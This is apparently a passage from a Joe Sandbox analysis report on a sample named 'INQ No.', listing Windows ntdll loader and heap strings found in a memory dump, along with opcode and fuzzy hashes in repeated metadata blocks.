                                                                                                                                                                            Strings
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 00F54899
                                                                                                                                                                            • LdrpCheckRedirection, xrefs: 00F5488F
                                                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00F54888
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: PS$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                            • API String ID: 0-405261330
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializationFailure, xrefs: 00F520FA
                                                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 00F520F3
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F52104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: #%u
                                                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: MUI$\U
                                                                                                                                                                            • API String ID: 0-3971960151
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrResSearchResource Enter, xrefs: 00EDAA13
                                                                                                                                                                            • LdrResSearchResource Exit, xrefs: 00EDAA25
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `$`
                                                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$MUI
                                                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • kLsE, xrefs: 00ED0540
                                                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00ED063D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: GlobalTags
                                                                                                                                                                            • API String ID: 0-1106856819
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .mui
                                                                                                                                                                            • API String ID: 0-1199573805
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: EXT-
                                                                                                                                                                            • API String ID: 0-1948896318
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: BinaryHash
                                                                                                                                                                            • API String ID: 0-2202222882
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #
                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: %
                                                                                                                                                                            • API String ID: 0-2291192146
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: BinaryName
                                                                                                                                                                            • API String ID: 0-215506332
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: P
                                                                                                                                                                            • API String ID: 0-707820851
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00F5895E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                            • API String ID: 0-702105204
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5cd92d690a7d7c3706961078e0be6c60e0c7228988dde5f8142467e442e16676
                                                                                                                                                                            • Instruction ID: d8e741d089f43e37cdc43ebe9665c111bb1ab05828ffb76dac46d4df8d1ae5f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd92d690a7d7c3706961078e0be6c60e0c7228988dde5f8142467e442e16676
                                                                                                                                                                            • Instruction Fuzzy Hash: B5424A75E002198FDB24CF69C881BADB7F5BF88750F18819DE949AB242DB349D81DF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5d6a978feb90a2812f49b2f054a048f9c1d5057883cf5228a62f594f660e3f94
                                                                                                                                                                            • Instruction ID: 0639a1af80ef77f139c5813eeb9a5cf76d126202683443b8a50af521fc5feed0
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d6a978feb90a2812f49b2f054a048f9c1d5057883cf5228a62f594f660e3f94
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E32C170E00759ABDB24CF69C8557BEBBF2BF84324F24811DE446DB285DB35A842EB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8c1b4396f096e5a54be8961aecda9aa60f99920f6d1299d49339f416ec48b0d3
                                                                                                                                                                            • Instruction ID: e8dfb1ae10e6d6706dbc029e57563d55ec707be6afc563df123bdc35582dcac2
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c1b4396f096e5a54be8961aecda9aa60f99920f6d1299d49339f416ec48b0d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F22D371A046508BDB24CF29C45477AB7F1AF84310F1AC49BE89A8F286D375D852FB63
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0ee7a019081ff50a14ee250d29c4f33a1186885c1257c6739669354725f752ab
                                                                                                                                                                            • Instruction ID: 608130a36f268ae71e6562a281b4a1c3f681786250840400d6d7289e09a416b0
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ee7a019081ff50a14ee250d29c4f33a1186885c1257c6739669354725f752ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C327C75A05205CFCB24CF68C980BAAB7F1FF48324F24956AE956AB391D734EC42DB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                            • Instruction ID: 121f401e2adec4c129350336219be9df026cda0dc79c37dd9ad087749fb0f877
                                                                                                                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                            • Instruction Fuzzy Hash: CDF16CB1E0121D9BDB15CFA9C590BBEB7F5AF48714F049129EA05BB281E734DD42CB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 47781a6b362ec39fc0edc4a3a256bce419fe2457a374a5e4eae92e488fbea311
                                                                                                                                                                            • Instruction ID: e9d76322de576814e7bcf05df94882043f56e74045d0b934d13effdf0d19bc17
                                                                                                                                                                            • Opcode Fuzzy Hash: 47781a6b362ec39fc0edc4a3a256bce419fe2457a374a5e4eae92e488fbea311
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BD1F572E006199BDF04CF58C841BFEB7F1AF88354F18826DD855E7281DB39E9069B60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b14871c7cb49b52201f8c566ffd30c5788678265e2a5304f40630d3d0e466397
                                                                                                                                                                            • Instruction ID: 4d555409266b21e51106817621317a82a37c5d831b78918a849434b6841fc232
                                                                                                                                                                            • Opcode Fuzzy Hash: b14871c7cb49b52201f8c566ffd30c5788678265e2a5304f40630d3d0e466397
                                                                                                                                                                            • Instruction Fuzzy Hash: 14E1BE71508341CFC714CF28C490A6ABBE0FF88318F15996EF999AB351DB31E906CB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ebb98e472cfa7f73ca91471c2d4545b2384f7c70c403573f8aa72fed00f8f7ad
                                                                                                                                                                            • Instruction ID: e38876e25efaa320f353a3031894d9c266768cf9e4c176d119c7ad5ba8aef2d1
                                                                                                                                                                            • Opcode Fuzzy Hash: ebb98e472cfa7f73ca91471c2d4545b2384f7c70c403573f8aa72fed00f8f7ad
                                                                                                                                                                            • Instruction Fuzzy Hash: 85D1DF72A006169BCB18CF24CB91FBA77E5BF44314F14422EF812EB281EB35E942DB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                            • Instruction ID: 6e9c86808792c52c2c6c1d2d26fec9b5f53466a341cd51887253a0c00f2e49e3
                                                                                                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BB19274A006049FDB24DFA5C940AABBBB9FF84395F104459AE42B7791DE34ED0BEB10
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                            • Instruction ID: e3bd1d1049343c1c4e2fcae79131f752f3cea78c702306135eddba674bc12faa
                                                                                                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                            • Instruction Fuzzy Hash: 12B14B3160068A9FDB25DB65C840BBEB7F6AF84310F244155E552E7382D774FD81EB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bf23495a173ee71d0ecb3d01caf92736aee9ecc9b20f9527d39409b1b1b25300
                                                                                                                                                                            • Instruction ID: 0a354abf16bd8bbb323a4eacb57c1d83947a8ca774902f2ee8db5bbc038b7ae2
                                                                                                                                                                            • Opcode Fuzzy Hash: bf23495a173ee71d0ecb3d01caf92736aee9ecc9b20f9527d39409b1b1b25300
                                                                                                                                                                            • Instruction Fuzzy Hash: AE71BF70A0420AEFCB14EF95DE42EDABBF8EF85310F11815AE511EB2A5C735A940FB54
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0d455593e2c42c706893aedc234691f0b17d7bbfc1ee57d71e796c5086157820
                                                                                                                                                                            • Instruction ID: 773e983fea976134a67156010031fc391644bf23c091d7b535ca76e54118caf9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d455593e2c42c706893aedc234691f0b17d7bbfc1ee57d71e796c5086157820
                                                                                                                                                                            • Instruction Fuzzy Hash: 1871F271A042869FC311DF29C880B6AB7E9FF84314F0585AAF959DB352DB34DC46CB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
